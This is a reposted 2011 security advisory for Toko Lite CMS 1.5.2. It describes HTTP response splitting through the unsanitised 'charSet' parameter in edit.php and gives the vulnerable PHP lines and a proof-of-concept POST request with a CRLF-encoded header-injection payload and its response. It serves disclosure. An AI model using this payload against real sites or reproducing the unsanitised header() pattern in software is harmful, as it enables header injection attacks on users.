来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability开发者: Toko产品主页: http://toko-contenteditor.pageil.net受影响版本: 1.5.2Summary: Toko Web Content Editor cms ......
Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability 开发者: Toko 产品主页: http://toko-contenteditor.pageil.net 受影响版本: 1.5.2
Summary: Toko Web Content Editor cms is a compact, multi language, open source web editor and content management system (CMS). It is advanced easy to use yet fully featured program that can be integrated with any existing site. It takes 2 minuets to install even for non technical users.
Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.
==================================================================== /edit.php: --------------------------------------------------------------------
3: $charSet = "iso-8859-1"; 4: $dir = "ltr"; 5: 6: if ( isset( $_POST[ "charSet" ] ) ) 7: { 8: $charSet = $_POST[ "charSet" ]; 9: 10: if ( $charSet == "windows-1255" ) 11: { 12: $dir = "rtl"; 13: } 14: } 15: www.2cto.com 16: header( "Content-Type: text/html; charset=" . $charSet );
====================================================================
Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2011-5048 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
CWE ID: 113
22.03.2011
------------
POST /tokolite1.5.2/edit.php HTTP/1.1 Content-Length: 55 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
--
HTTP/1.1 302 Found Date: Tue, 22 Mar 2011 03:57:30 GMT Server: Apache/2.2.14 (Win32) X-Powered-By: PHP/5.3.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: Login.php Content-Length: 0 Keep-Alive: timeout=5, max=64 Connection: Keep-Alive Content-Type: text/html; charset= ZSL-Custom-Header: love_injection |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com